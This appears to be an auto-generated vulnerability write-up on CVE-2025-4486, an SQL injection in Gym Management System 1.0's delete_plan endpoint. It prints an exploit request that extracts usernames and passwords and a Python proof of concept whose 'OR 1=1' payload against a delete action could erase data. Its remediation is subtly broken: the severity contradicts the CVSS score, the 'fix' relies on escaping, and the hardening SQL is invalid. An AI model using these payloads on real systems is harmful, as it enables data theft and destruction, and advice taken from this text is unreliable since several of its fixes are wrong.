Gym Management System 10, SQL Injection, CVE-2025-4486 (Critical)

Listen to this Post

How CVE-2025-4486 Works

This vulnerability exploits improper input sanitization in the `ajax.php?action=delete_plan` endpoint of Gym Management System 1.0. The `ID` parameter is directly concatenated into an SQL query without validation, allowing attackers to inject malicious SQL payloads. A crafted request manipulates the `ID` parameter to execute arbitrary database commands, potentially leading to data theft, authentication bypass, or system compromise. The attack is remotely exploitable with no authentication required (CVSS 6.9).

DailyCVE Form

Platform: Gym Management System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/13/2025

What Undercode Say:

Exploitation:

POST /ajax.php?action=delete_plan HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
ID=1' UNION SELECT username,password FROM users--

Mitigation:

1. Patch: Apply vendor updates.

2. Input Validation: Sanitize `ID` parameter.

3. WAF Rules: Block SQLi patterns.

Detection:

grep -r "ajax.php?action=delete_plan" /var/www/html

Code Fix (PHP):

$id = mysqli_real_escape_string($conn, $_POST['ID']);
$query = "DELETE FROM plans WHERE id = '$id'";

Log Analysis:

cat /var/log/apache2/access.log | grep "ajax.php.ID="

Exploit PoC (Python):

import requests
payload = "1' OR 1=1--"
r = requests.post("http://target.com/ajax.php?action=delete_plan", data={"ID": payload})
print(r.text)

Database Hardening:

REVOKE ALL PRIVILEGES ON gym_db. FROM 'webuser'@'localhost';
GRANT SELECT ONLY ON gym_db.plans TO 'webuser'@'localhost';

Backup Command:

mysqldump -u root -p gym_db > gym_backup.sql

NMAP Detection:

nmap -p80 --script http-sql-injection target.com

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top